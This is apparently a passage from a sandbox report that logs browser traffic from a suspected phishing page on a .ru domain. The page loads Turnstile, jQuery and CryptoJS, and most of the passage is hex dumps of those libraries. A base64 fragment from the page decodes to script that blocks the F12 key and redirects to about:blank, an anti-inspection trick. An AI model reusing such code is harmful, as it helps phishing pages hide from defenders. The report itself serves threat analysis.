                                                                                  Data Ascii: 3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAg


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.649727104.18.94.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:02 UTC653OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://7x8x.digitalvoyage.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:02 UTC386INHTTP/1.1 302 Found
                                                                                  Date: Tue, 07 Jan 2025 18:49:02 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  location: /turnstile/v0/g/849bfe45bf45/api.js
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6201d8b4a7c6f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.649728151.101.130.1374436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:02 UTC627OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                  Host: code.jquery.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://7x8x.digitalvoyage.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:02 UTC611INHTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  Content-Length: 89501
                                                                                  Server: nginx
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                  ETag: "28feccc0-15d9d"
                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                  Accept-Ranges: bytes
                                                                                  Age: 1760269
                                                                                  Date: Tue, 07 Jan 2025 18:49:02 GMT
                                                                                  X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890042-NYC
                                                                                  X-Cache: HIT, HIT
                                                                                  X-Cache-Hits: 55, 0
                                                                                  X-Timer: S1736275742.295954,VS0,VE1
                                                                                  Vary: Accept-Encoding
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                  2025-01-07 18:49:02 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.649726104.17.24.144436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:02 UTC655OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                  Host: cdnjs.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://7x8x.digitalvoyage.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:02 UTC963INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:02 GMT
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: public, max-age=30672000
                                                                                  ETag: W/"61182885-40eb"
                                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Timing-Allow-Origin: *
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1141490
                                                                                  Expires: Sun, 28 Dec 2025 18:49:02 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IIOVyvjA3TXtXvbhw%2BCLeKgZkiUYCK3G60ZY%2BZ%2BL4zUlIKyuBpkh%2BW6cUstdyuD1AYENHroJym1DIj1h6Kgjl3O3CwSZ2L6aCvFphABO%2BDgwEOKoYEfJsB1SHnmrzw1xMqHlwLLU"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6201d8b7341f5-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:02 UTC406INData Raw: 37 62 65 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                  Data Ascii: 7bee!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                  2025-01-07 18:49:02 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                                                                  Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                                                                  2025-01-07 18:49:02 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                                                                  Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
                                                                                  2025-01-07 18:49:02 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                                                                  Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
